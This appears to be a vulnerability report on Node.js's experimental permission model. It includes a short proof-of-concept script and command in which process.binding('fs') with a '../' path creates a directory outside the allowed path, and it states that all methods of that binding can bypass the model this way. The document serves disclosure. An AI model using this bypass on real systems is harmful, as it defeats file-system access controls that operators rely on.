Summary: process.binding(‘fs’) bypassed the permission model validation against path traversal
Description: process.binding(‘fs’) can be used to bypass the path traversal validation for the permisison model
Create the following index.js and store at /home/pathtraversal/
// index.js
const fs = process.binding('fs')
fs.mkdir('/home/pathtraversal/../test0', 511, false, null, null)
$ pwd
/home/pathtraversal/
$ node --experimental-permission --allow-fs-read="/home/pathtraversal/*" --allow-fs-write="/home/pathtraversal/*" index.js
/home/test0
will be created bypassing the permission model validation
All the methods exposed by the process.binding(‘fs’) could eventually bypass the permission model using path traversal. It will require the attacker to read the node_file.cc implementation, but that’s trivial.